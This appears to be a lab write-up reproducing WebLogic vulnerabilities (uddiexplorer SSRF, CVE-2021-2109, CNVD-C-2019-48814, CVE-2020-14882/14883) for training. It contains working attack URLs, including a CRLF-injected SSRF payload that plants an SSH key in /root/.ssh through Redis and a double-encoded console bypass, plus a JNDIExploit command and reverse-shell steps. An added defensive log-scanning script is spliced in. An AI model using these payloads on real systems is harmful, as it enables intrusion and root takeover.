Weblogic vulnerability recurrence

Time: 2022-1-19


Weblogic ssrf

https://www.hetianlab.com/expc.do?ec=ECID9d6c0ca797abec2017021014312200001

Experimental environment

WebLogic server: CentOS 6.5, WebLogic version 10.3.6.0, IP 10.1.1.157
Redis server: CentOS 6.5, redis-2.8.13, IP 10.1.1.111
Attacker host: Kali, IP random

Turn off firewall

Start Weblogic


There is a gotcha here:

WebLogic must keep running in the background the whole time.

Visit http://10.1.1.157:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1/xxx&rdoSearch=name&btnSubmit=Search


The server accessed the /xxx directory on our behalf.

Forging HTTP headers

HTTP headers are separated by "\r\n", where \r encodes as %0d and \n as %0a. We construct a malicious Host header as follows: http://10.1.1.157:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1/xxx%20HTTP/1.1%0d%0aHOST: www.baidu.com %0d%0aaas%0d%0a&rdoSearch=name&btnSubmit=Search


Port probing using SSRF

Visit http://10.1.1.157:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:22&rdoSearch=name&btnSubmit=Search


A response was received from 127.0.0.1:22.

This shows that port 22 is open.


Tried all: ‘1’ addresses, but could not connect to the server via http

This shows that port 23 is closed.

Using SSRF to write an SSH public key via Redis

exp: http://10.1.1.157:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.1.1.111:6379/hello%20HTTP/1.1%0d%0aset test "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQClLfjZfhEz8i1Rg0iKNj3WGul+Vb0B7DK77uCYNxLrcTNT0kl+Chkeg2v2gpfCzuINm4nEwu0fznfoSlBtNhYpEgaiKDlKT3AAI6MyKFh5uIq332ihZ4kMO7NefvcMLbPL4XywgM/CnQc90YxDKHbEbjwZTgAzJsnRnCWfv4RzbV+Pq9agSUnURW8hWZ1lxAMFuOFmUBO4Ld5DCFQwUnS5YPJiYgjzks46DZT0n1onZIUh3XP601DGu2TPtuZLs43drjpVoFlOkXkQkFCYJTQQpe89lRl3xoi6lS8Bf+vdaQ5PnBBZDVYRm+NjRCCyWZDSSa5WiwvhcoGmpwl2eud/ [email protected]\n\n\n\n"%0d%0aconfig set dir /root/.ssh/%0d%0aconfig set dbfilename "authotrized_keys"%0d%0a%0d%0asave%0d%0aexit%0d%0asdsdd%0d%0a&rdoSearch=name&btnSubmit=Search


Write successful.

CVE-2021-2109 WebLogic LDAP remote code execution vulnerability:

https://www.hetianlab.com/expc.do?ec=ECIDa2bb-83d8-4dbe-bc38-0423ce125df7

Visit target 10.1.1.109:7001


Visit /console/css/%252e%252e%252f/consolejndi.portal


Start a JNDI server

java -jar JNDIExploit.jar -i IP (attacker address)


Reverse shell

Burp could not be used here; the replay failed.

CNVD-C-2019-48814 WebLogic deserialization remote command execution vulnerability:

https://www.hetianlab.com/expc.do?ec=ECID3f28-5c9a-4f95-999d-68fa2fa7b7aa


The async directory exists.


As shown in the figure, the server has the wls9_async_response component enabled, so the CNVD-C-2019-48814 vulnerability is present.

Reverse shell


Use Burp to capture and modify the packet.


A "202 Accepted" response indicates success.


Reverse shell successful.


Automating the reverse shell with a script

Upload webshell


Capture and modify the packet.


202, success


Python script (given in the original only as a screenshot):

CVE-2020-14882 & CVE-2020-14883 WebLogic unauthorized access vulnerability:

https://www.hetianlab.com/expc.do?ec=ECIDfdd4-97c8-4e32-89b7-df58dd102e4c

Experimental environment

Target: Docker + WebLogic 12.2.1.3, IP 10.1.1.109
Attacker: Kali, IP 10.1.1.110

Check whether the console exists

http://IP:Port/console


Vulnerability URL: http://IP:Port/console/css/%252e%252e%252fconsole.portal

Here %252E%252E%252F is the double URL encoding of ../
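As an added defender-side example (not code from the original post), the following Python script parses constructed WebLogic access-log lines and flags the two request shapes this write-up relies on: a uddiexplorer `operator` parameter that points at an internal host or carries %0d%0a CRLF injection (the SSRF section above), and a double-URL-encoded `../` under /console/css/ (this section). The log format, the sample lines and the private-address list are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (Common Log Format), not from the original post.
SAMPLE_LOG = """\
10.1.1.110 - - [19/Jan/2022:10:00:01 +0800] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:22&rdoSearch=name&btnSubmit=Search HTTP/1.1" 200 512
10.1.1.110 - - [19/Jan/2022:10:00:02 +0800] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.1.1.111:6379/x%20HTTP/1.1%0d%0aset%20a%20b&rdoSearch=name HTTP/1.1" 200 512
10.1.1.110 - - [19/Jan/2022:10:00:03 +0800] "GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 404 0
10.1.1.50 - - [19/Jan/2022:10:00:04 +0800] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 1024
10.1.1.50 - - [19/Jan/2022:10:00:05 +0800] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://uddi.example.com/inquiry&rdoSearch=name HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# Loopback, RFC 1918 and link-local ranges: a UDDI registry should never live here (assumed policy).
PRIVATE_HOST_RE = re.compile(r'^(?:127\.|10\.|192\.168\.|172\.(?:1[6-9]|2\d|3[01])\.|169\.254\.|0\.0\.0\.0$|localhost$)')


def classify(target: str) -> list[str]:
    """Return a list of findings for one request target (path plus query string)."""
    findings = []
    parts = urlsplit(target)
    path = parts.path.lower()
    # The server decodes the path once; a second decode reveals what %252e%252e%252f really was.
    once = unquote(parts.path)
    twice = unquote(once)
    if path.startswith('/console/css/') and '../' in twice:
        findings.append('double-encoded traversal under /console/css/ (CVE-2020-14882 pattern)')
    if path.endswith('/uddiexplorer/searchpublicregistries.jsp'):
        qs = parse_qs(parts.query)  # parse_qs already turns %0d%0a into \r\n
        for op in qs.get('operator', []):
            if '\r' in op or '\n' in op:
                findings.append('CRLF injection in operator')
            host = urlsplit(op).hostname or ''
            if PRIVATE_HOST_RE.match(host):
                findings.append(f'SSRF to internal host {host}')
    return findings


def scan(log_text: str) -> list[tuple[str, str, str]]:
    """Scan a whole log; yield (client ip, status, finding) for every hit."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        for finding in classify(m['target']):
            alerts.append((m['ip'], m['status'], finding))
    return alerts


if __name__ == '__main__':
    for ip, status, finding in scan(SAMPLE_LOG):
        print(f'{ip} (HTTP {status}): {finding}')
```

The status code is reported alongside each hit because, as noted below, the first traversal attempt may well return 404 and still deserve attention.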


The first visit may return a 404.


The second visit works normally.

Exploit the vulnerability


Note: copy up to the semicolon.


Add a "CMD: command" header to the HTTP request.